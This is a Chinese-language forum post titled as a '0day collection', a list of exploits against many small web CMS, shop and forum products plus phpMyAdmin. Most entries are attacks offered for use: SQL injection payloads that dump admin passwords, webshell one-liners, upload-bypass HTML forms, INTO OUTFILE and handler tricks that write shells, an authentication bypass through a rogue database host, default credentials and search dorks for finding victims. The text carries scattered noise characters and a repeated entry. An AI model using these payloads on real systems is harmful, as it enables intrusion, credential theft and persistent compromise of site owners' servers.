0day合集

admin

启航企业建站系统 cookie注入漏洞通杀所有版本

直接上exploit:
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
. o% k$ `8 }2 stest:http://www.tb11.net/system/xitong/shownews.asp?id=210
4 g0 B, k3 u7 [: w7 Z5 B6 y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 Y$ v" }! }4 {% C- w. T/ q- JAsprain论坛 注册用户 上传图片就可拿到webshell
' h5 _3 d2 o( I  ~$ I3 R( m# N
7 ~4 t$ V: e5 r: n7 v+ N; WAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛，一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
+ k. `" C/ X4 R, T8 J% m1.txt存放你的一句话马 如：<%execute(request("cmd"))%>
* v0 Y; F1 D4 _4 O, y/ B1 K2.gif 为一小图片文件，一定要小，比如qq表情图片
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头，但是现在传上去还不行，我接下来就用
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
  f# D( Q' A' g% y0 d. k5.q.asp;.gif
4 C3 _! c$ @; n2 q( Sgoogle：Powered by Asprain
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

ShopNum1全部系统存在上传漏洞。
$ }" L( P% |- `# L$ R
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
' T, v$ h# W6 r8 W2 P按说明 提示登录后台。。
在后台功能页面->附件管理->附件列表
可以直接上传.aspx 后缀木马
http://demo.shopnum1.com/upload/20110720083822500.aspx
0 f1 n$ ]5 w: g7 b2 Y3 C( F--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* l/ M0 z/ J5 d* g  f- F5 Q+ I* `
4 x( v  l9 n6 K$ s牛牛CMS中小企业网站管理系统 上传漏洞

$ D$ b7 e9 F5 O* y牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
9 M# H1 M& a& r* z  C# w8 z; S后台:admin/login.asp
ewebeditor 5.5 Nday
exp:
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
<input?type=file?name=uploadfile?size=100><br><br>?
& v! f, k7 z! h<input?type=submit?value=upload>?
</form>
1 V' v5 _; b( E7 e1 Ops:先上传小马.
inurl:member/Register.asp 您好，欢迎来到立即注册立即登录设为首页加入收藏
5 W0 f7 U; ?, y* V; X
* m; o5 S% e3 d6 u" p& y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ F, V8 K6 s2 M
, o0 C4 y' M( Z1 Z9 k# r/ r4 n1 b# ^YothCMS 遍历目录漏洞
7 R( H: e& {$ m2 O& P$ f8 S
- X( K3 w2 N1 @% [9 C3 Z* C优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
5 H3 G0 H/ g# c默认后台:admin/login.asp
遍历目录:
' `9 p3 r5 f- p$ z7 e1 Q% r( Qewebeditor/manage/upload.asp?id=1&dir=../
3 x6 B: I# j+ D" kdata:
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Net112企业建站系统 1.0

源码简介：
* d$ U5 w  d" m. u& A' h" p, QNet112企业建站系统，共有：新闻模块，产品模块，案例模块，下载模块，相册模块，招聘模块，自定义模块，友情链接模块 八大模块。
" i2 J* V# Q; s  |添加管理员：
http://www.0855.tv/admin/admin.asp?action=add&level=2
其实加不加都不是很重要，后台文件都没怎么作验证。
上传路径：
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
# i/ y! m' m1 b* jhttp://www.0855.tv/inc/Upfile.asp?Stype=2
/ ~8 t4 a9 Y; @" |$ w0 e. z怎么利用自己研究。
遍历目录：
http://www.0855.tv/admin/upfile.asp?path=../..
  K" r" u9 Q3 Q如：
http://www.0855.tv/admin/upfile.asp?path=../admin
" e7 K; H" u9 p; uhttp://www.0855.tv/admin/upfile.asp?path=../data
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

易和阳光购物商城通杀 上传漏洞
9 O' V8 B( e5 n  [3 [" b9 N
前提要求是IIS6.0+asp坏境。
漏洞文件Iheeo_upfile.asp
1 i! O% T8 O/ W过滤不严.直接可以iis6.0上传
把ASP木马改成0855.asp;1.gif
直接放到明小子上传
Google搜索：inurl:product.asp?Iheeoid=
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( A4 n5 A! S, V
phpmyadmin后台4种拿shell方法
9 V4 L' t/ M/ @- c/ j2 M3 h
' q, z& a2 O) Z- `4 B方法一：
7 Q2 r# d1 b- |" PCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
+ o! k8 A( i+ l  PINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
4 c( {- i1 }0 L) E----以上同时执行，在数据库: mysql 下创建一个表名为：xiaoma，字段为xiaoma1，导出到E:/wamp/www/7.php
* [' m+ T" l8 ]5 x: D! b一句话连接密码：xiaoma
方法二：
( K- m1 b% v1 ^Create TABLE xiaoma (xiaoma1 text NOT NULL);
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
8 D9 |, ?0 a4 b3 \% S  z# xselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
. |! r2 z- p7 PDrop TABLE IF EXISTS xiaoma;
方法三：
读取文件内容：    select load_file('E:/xamp/www/s.php');
写一句话：select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
cmd执行权限：select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
/ A7 L% j4 l5 o  l. n5 T方法四：
7 i5 F3 o( F0 P' W! [' vselect load_file('E:/xamp/www/xiaoma.php');
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
7 v' w( R9 V' B1 g8 |% o2 u  X然后访问网站目录：http://www.xxxx.com/xiaoma.php?cmd=dir
0 G2 |& m8 o# P7 s1 M* w7 Y3 W--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 Q7 Z. a0 W; I) e5 M
传信网络独立开发网站源码0day漏洞
* C* y4 h* r% C2 V9 v  e0 i
/ u  m4 z0 I, |8 X6 k' g# d后台system/login.asp
* f. h" V. |7 a* h8 K进了后台有个ewebeditor
% U' s7 u+ X( ^4 x9 XGoogle 搜索inurl:product1.asp?tyc=
编辑器漏洞默认后台ubbcode/admin_login.asp
* I* R; G- X* E4 t# D1 [/ `# Z# {数据库ubbcode/db/ewebeditor.mdb
+ U: n. ~  J7 ^) v' ~默认账号密码yzm 111111
" {$ ?; S. Q  A6 j2 v  u! f( g
. ^' S" Z! H7 g" N# ]3 J/ A$ y拿webshell方法
登陆后台点击“样式管理”-选择新增样式
样式名称:scriptkiddies 随便写
: v& @" b/ M, ]- o1 r% E* m路径模式：选择绝对路径
3 E9 ?1 K& C9 l) y) p/ Z, ~图片类型：gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
图片类型比如就是我们要上传的ASP木马格式
上传路径：/
图片限制：写上1000 免的上不了我们的asp木马
5 Y; \: i/ Y  \( P' x上传内容不要写
可以提交了
8 V9 K- S/ J* Z3 ]9 t% c+ N样式增加成功！
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
# @! m( ?# z/ f5 N3 N# t按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
0 u: u& u6 Z5 M+ K$ q8 M- u网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
上ASP木马 回车 等到路径
* e+ d# k4 d* i: D6 t$ s
后台：system/login.asp
) g1 f! b; c7 Y* o4 m6 j: L! X6 JExp:
) n( [( b2 n' Kand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
测试:
' j4 p& T9 w5 D0 w( W! i' y+ ^http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
) s! m0 a+ d' W- h$ Q* I% `http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
; Y7 _3 P6 Y) H4 `0 v( v6 W--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

/ Y( Q# r) K. f, C, z/ xfoosun 0day 最新注入漏洞

漏洞文件：www.xxx.com/user/SetNextOptions.asp
2 e  U4 o1 F8 [1 k利用简单的方法：
暴管理员帐号：
: B; h; i3 f: P  J5 n* R, i1 }' Hhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
4 B/ \8 O( R0 A' F2 B, i+ i% w暴管理员密码：
' {# L& |7 s2 {http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
# a! E. [1 Q! @0 ]. t--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) I4 _( W  B6 O# H
网站程序的版权未知！

& \7 N2 E1 A4 |默认网站数据库：
$ E: x; [# L& R+ c8 |5 a' twww.i0day.com/data/nxnews.mdb
* o! H5 M9 d! H0 e1 y4 X( D+ bewebeditor 在线编辑器：
编辑器数据库下载地址：www.i0day.com/ewebeditor/db/ewebeditor.mdb
登录地址：ewebeditor/admin_login.asp
+ e2 F0 m, C* M# D  W& F5 D默认密码：admin  admin
, k, ?2 w2 a% x  _登陆后可遍历目录：ewebedtior/admin_uploadfile.asp?id=22&dir=../../data

1 ]4 O' {5 S! I4 f2 _Sql注入漏洞：
http://www.i0day.com/detail.asp?id=12
exp:
0 m/ ^+ _7 I% i5 f6 bunion select 1,admin,password,4,5,6,7,8 from admin
爆出明文帐号/密码

上传漏洞：
后台+upfile.asp
0 K! b7 J# x2 E+ v# d& k% A如：
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
- @3 _7 L& d- W/ B; q' s. A# ]3 Z  zshell的地址：网址+后台+成功上传的马
google:inurl:news.asp?lanmuName=
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. ~+ N. ~! ~1 M& \. \3 D
7 [) @7 e9 V; s; r7 m: Ndedecms最新0day利用不进后台直接拿WEBSHELL

拿webshell的方法如下：
  U" Q8 J4 Q3 X7 l7 Q- r9 P网传的都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell.
+ L  |( L& W2 ]( R前题条件，必须准备好自己的dede数据库，然后插入数据：
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
6 r% {2 i- H, M, }& O! W6 n
再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
% d7 ~! ]$ I) M6 h6 h<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
3 t8 s) N( ~" n" x" D# y<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
0 M. D7 Z, Y3 C1 W5 @; @<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
* y: Q4 q* [6 z; C<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
4 X4 }' h. k$ v2 @" j! |  mfunction addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
0 [$ m' A! U! V7 C# c-----------------------------------------------------------------------------------------------------------------------------------------------

dedecms织梦暴最新严重0day漏洞
bug被利用步骤如下：
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面{}上的字母改为当前的验证码，即可直接进入网站后台。
-------------------------------------------------------------------------------------------------------------------------------------------

( {1 N/ @, a) S. n多多淘宝客程序上传漏洞
漏洞页面：
  }. I) S2 E  N5 @admin\upload_pic.php
传送门：
% ]4 J. c4 N# x# ~0 |http://www.www.com/admin/upload_pic.php?uploadtext=slide1
PS:copy张图片马 直接  xxx.php 上传抓包地址！
: T, H' R6 |3 _, L" m7 C------------------------------------------------------------------------------------------------------------------------------------------------------
/ P6 E! m8 E% B" t
无忧公司系统ASP专业版后台上传漏洞
1 c: V. p5 z5 T! h漏洞文件 后台上传
! U# M8 X& c6 wadmin/uploadPic.asp
漏洞利用 这个漏洞好像是雷池的
' [, i* p$ m5 d: D( khttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
# N, g6 I6 s. K9 V2 F等到的webshell路径：
/UploadFiles/scriptkiddies.asp;_2.gif
  d/ O9 {0 e- \9 m" z9 |& o7 t---------------------------------------------------------------------------------------------------------------------------------------------------

住哪酒店分销联盟系统2010
Search：
' n' B- x% D) `) V0 qinurl:index.php?m=hotelinfo
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
. x7 v$ O$ n' [默认后台：index.php?m=admin/login
--------------------------------------------------------------------------------------------------------------------------------------------------
% S9 J) W' y$ l( b: _# I$ I5 e" p
& R. c# O! X. C6 uinurl:info_Print.asp?ArticleID=
& o2 s$ _+ N$ [. R后台 ad_login.asp
爆管理员密码：
& _$ O1 F( e0 ?' A) uunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
------------------------------------------------------------------------------------------------------------------------------------------------------------
. I' O+ \1 @5 K3 a8 |
2 }& P2 H( F- u( n% v搜索框漏洞！
) }/ r* z+ B" A7 i%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
3 Y1 o; P/ b2 F5 _8 ^* t# h  g--------------------------------------------------------------------------------------------------------------------------------------------------------
' V& p! w) _$ b4 {4 k+ s4 K
, a2 B$ l4 K- J2 X, k" r% X关键字：
inurl:/reg_TemletSel.asp?step=2
6 \0 ^. y0 w/ k或者
! t7 L) q: L3 L电子商务自助建站--您理想的助手
& ~: h7 L. T, ~- }& t-------------------------------------------------------------------------------------------------------------------------------------------------

iGiveTest 2.1.0注入漏洞
; [: e" H" e- U9 R/ X* pVersion: <= 2.1.0
# Homepage: http://iGiveTest.com/
谷歌关键字: “Powered by iGiveTest”
随便注册一个帐号。然后暴管理员帐号和密码
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
------------------------------------------------------------------------------------------------------------------------------------------------

CKXP网上书店注入漏洞
工具加表:shop_admin 加字段:admin
  m  O. e% q& X( [& C后台:admin/login.asp
5 E3 ]7 U* T0 `* U0 `) O" v登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

段富超个人网站系统留言本写马漏洞
3 x* r: c7 ]8 l# n8 S源码下载：http://www.mycodes.net/24/2149.htm
addgbook.asp 提交一句话。
连接： http://www.xxxx.tv/date/date3f.asp
: T, e* _; L/ u1 cgoogle:为防批量，特略！
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* V/ w. B6 _2 y; P
% s& T, v0 q2 \, j8 S0 m智有道专业旅游系统v1.0 注入及列目录漏洞
# ~2 c" m% _, [9 m: ^默认后台路径：/admin/login.asp
默认管理员：admin
默认密码：123456
SQL EXP Tset:
% R% j7 N9 c. h  k* v, fhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
; v0 t& p9 ^; X  B. t& [- l------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# B2 I! U: Z, W2 M0 U% z4 S
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
) l# U" ?& B& `4 r: V' PEXP：
<title>eWebeditoR3.8 for php任意文件上EXP</title>
7 m7 m% W5 R7 {, X$ i& {<form action="" method=post enctype="multip
2 e3 _; Y0 r; v  o0 }* d; Z4 N) @4 Aart/form-data">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
& Y8 ?4 L, D4 {<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
file:<input type=file name="uploadfile"><br>
! H, ?3 U2 k& {. `5 w3 t4 P<input type=button value=submit onclick=fsubmit()>
</form><br>
<script>
1 M- l0 C" m4 a6 Tfunction fsubmit(){
: ]" |5 t; P3 M0 c- r$ g, e$ ?form = document.forms[0];
6 w( H* w0 ^7 {+ G" s1 yform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
alert(form.action);
form.submit();
3 \& m, I% |% u  U}
</script>
; h7 U) ], Z) k# u, t! ]' K6 W注意修改里面ewebeditor的名称还有路径。
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, X. t+ g) Q( a% B7 C4 P
提交’时提示ip被记录 防注入系统的利用
网址：http://www.xxx.com/newslist.asp?id=122′
提示“你的操作已被记录!”等信息。
利用方法：www.xxx.com/sqlin.asp看是否存在，存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
) t- a# f/ Q* l5 N-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

西部商务网站管理系统 批量拿shell-0day
, O$ W3 m  g  V' J: ^这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
* T1 Z' c5 P2 d+ P1 ~1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
! Y+ H4 E" x' F" ?3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
. u! G* y: V  U2 e; p6 [---------------------------------------------------------------------------------------------------------------------------------------------------------------------------

4 H. z/ J" x1 M9 D; T  `1 cJspRun!6.0 论坛管理后台注入漏洞

SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
JspRun!6.0
4 a0 A* l7 L6 v$ G漏洞描述:
JspRun!论坛管理后台的export变量没有过滤，直接进入查询语句，导致进行后台，可以操作数据库，获取系统权限。
在处理后台提交的文件中ForumManageAction.java第1940行
' c* N5 c: m+ `: {+ Q$ j! \+ bString export = request.getParameter("export");//直接获取，没有安全过滤
if(export!=null){
List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语，执行了...
+ Z. l5 x8 B8 X; Z$ iif(styles==null||styles.size()==0){
0 Y; H7 q) L' {1 L; x<*参考
nuanfan@gmail.com
*> SEBUG安全建议:
( E3 v6 V1 E. b2 awww.jsprun.net
（1）安全过滤变量export
（2）在查询语句中使用占位符
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) ?- Z+ N% i  V/ z% z% [) |& x. [
! `  x% m# w6 y1 J乌邦图企业网站系统 cookies 注入

/ V7 h$ b4 u6 Q( u) W1 t程序完整登陆后台:/admin/login.asp
. S; W# O3 Y0 ~默认登陆帐号:admin 密码:admin888
语句：(前面加个空格)
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
或者是16个字段：
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
爆不出来自己猜字段。
8 L" B) q  i$ U5 F. r4 K9 [注入点：http://www.untnt.com/shownews.asp?=88
getshell:后台有备份，上传图片小马。备份名：a.asp 访问 xxx.com/databakup/a.asp
关键字：
inurl:shownews?asp.id=
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

1 B4 u! B6 u) _. L# v  T  PCKXP网上书店注入漏洞

工具加表:shop_admin 加字段:admin
后台:admin/login.asp
: [* ?4 K5 O0 s0 {% g0 D" @登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
# V* b4 x4 |# n3 t( }0 t) v( c---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ W$ D  V6 N% t+ C6 D
2 a) L5 T4 _$ cYxShop易想购物商城4.7.1版本任意文件上传漏洞
5 f+ w9 e0 I6 S9 ]3 @0 E
- D- X5 H6 t% t+ j7 Yhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
: A. L7 N6 s3 E! o: q1 T5 g跳转到网站根目录上传任意文件。
如果connector.aspx文件被删可用以下exp，copy以下代码另存为html，上传任意文件
9 U* b$ @3 ^: W<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
* S% ?  c1 y) G# ^! l8 ~: wUpload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. S4 Q/ r* q# K! |
0 |: q9 l, g3 h* F1 B$ g5 ?SDcms 后台拿webshell

' l( d+ Y0 O- @" ^# f9 ]) |; E第一种方法：
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
' V" b& {! |8 \* ]- {2 w把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx
用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。
第二种方法：
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
在文件类型里面添加一个aaspsp的文件类型，然后找一个上传的地方直接上传asp文件！ 注：修改文件类型后不能重复点保存！
第三种方法：
0 M5 C* ]) P4 T& {$ ?5 ^* ~进入后台-->界面管理-->模板文件管理-->创建文件
+ b" P3 ]* V& ^# H! [文件名写入getshell.ashx
内容写入下面内容：
* Z. y$ O3 m. M) |9 @; ?% u  `% p/====================复制下面的=========================/
; j( u. A9 e, O/ t+ V  M8 r: w<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
" C, G2 F0 T3 b5 Vusing System.IO;
. E( P/ o5 r8 Fpublic class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
+ U' E$ e' T, O/ `- d0 M) TStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
file1.Flush();
. i9 h& w4 l3 Y' K. tfile1.Close();
}
# H  F2 `1 u# v; y1 P. O2 y0 Xpublic bool IsReusable {
get {
return false;
3 X- G% Z, E; F5 F9 \0 c4 I' E; d}
}
}
" A% x7 V: b) }$ d7 h/=============================================/
# q0 F# `/ P5 r/ A7 y  }/ Q/ z访问这个地址：http://www.xxx.com/skins/2009/getshell.ashx
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

ESCMS网站管理系统0day
5 ]( F$ o1 Z2 S) y
# P8 S: \( |( b* t* ?后台登陆验证是通过admin/check.asp实现的

首先我们打开http://target.com/admin/es_index.html
然后在COOKIE结尾加上
4 [* Y. U. j5 q6 U( G' ]- F; ESCMS$_SP2=ES_admin=st0p;
7 W/ f; `3 l6 w" u7 j( @5 V修改,然后刷新
; Q. S0 \" ^6 E' a5 D; |进后台了嘎..
# x3 t3 v6 s& |6 V. F$ J然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
+ [0 a/ s9 s% i3 X6 }
4 y- \7 }- X4 F4 G利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
( n* g% \& N+ g2 a存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
% [/ r  |$ t" \+ x" H4 _在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
2 b! J# l7 O; [% H# {+ Y------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

- ~( [0 J$ k* y; Q0 ?宁志网站管理系统后台无验证漏洞及修复

% N# B6 k) Z2 C1 b6 G( n5 D! ^网上搜了一下,好像没有发布.如有雷同纯粹巧合!
官方网站:www.ningzhi.net
0 y" B1 @- R- d: ?学校网站管理系统 V.2011版本
/ W6 P; u" G( n5 g" k4 Z3 }http://down.chinaz.com/soft/29943.htm
其它版本(如:政府版等),自行下载.
9 V9 \5 R1 r; }1 i3 s) u2 Z- x& i( W* [漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
login.asp代码如下:
9 i3 I" j$ v3 n3 r4 w/ ^9 P<%  response.Write"<script language=javascript>alert('登陆成功！请谨慎操作！谢谢！');this.location.href='manage.asp';</script>" %>
manage.asp代码我就不帖出来了.反正也没验证.
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
' B- s: C/ Z: F) [漏洞利用:
; W$ O+ m+ C! j直接访问http://www.0855.tv/admin/manage.asp
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 K5 Q. @, x, S9 I* @
phpmyadmin拿shell的四种方法总结及修复

: f" N# ?$ K. W8 w方法一：
; D: {4 D9 V. a% k9 Y" dCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
----以上同时执行，在数据库: mysql 下创建一个表名为：study，字段为7on，导出到E:/wamp/www/7.php
/ t$ O3 }- i6 {4 X5 [    一句话连接密码：7on
$ @7 V! K3 N. w  X: b5 A/ y方法二：
读取文件内容：    select load_file('E:/xamp/www/s.php');
1 J% Q$ ?1 n5 Q, q# m/ p" G写一句话：    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
cmd执行权限：    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
, }, X) z4 w- X7 D1 U% }- g5 H方法三：
) v1 y8 a9 a" P8 m; }3 cJhackJ版本 PHPmyadmin拿shell
Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
select cmd from study into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS study;
  ]+ L1 P% T' A+ x& {- Q, R5 w<?php eval($_POST[cmd])?>
7 ^+ I% |- h1 s/ V6 kCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数： 1
2 S# g/ p" B- s$ G& l9 Z6 XSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数： 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
方法四：
. M0 T# @. a' Q5 N  T; `" i1 T8 b# tselect load_file('E:/xamp/www/study.php');
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
9 ^2 y4 V# l7 A& s: X然后访问网站目录：http://www.2cto.com/study.php?cmd=dir
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

NO.001中学网站管理系统 Build 110628 注入漏洞
* A; H) H5 X) `$ \
NO.001中学网站管理系统功能模块:
1.管理员资料:网站的基本信息设置（校长邮箱等）,数据库备份,用户管理、部门及权限管理等
, y" i# [" t6 Z* @% n( p3 W) |( W1 Y1 w2.学校简介:一级分类，可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
3.文章管理:二级分类,动态添加各相关频道（图片视频频道、学校概况频道除外）文章等信息
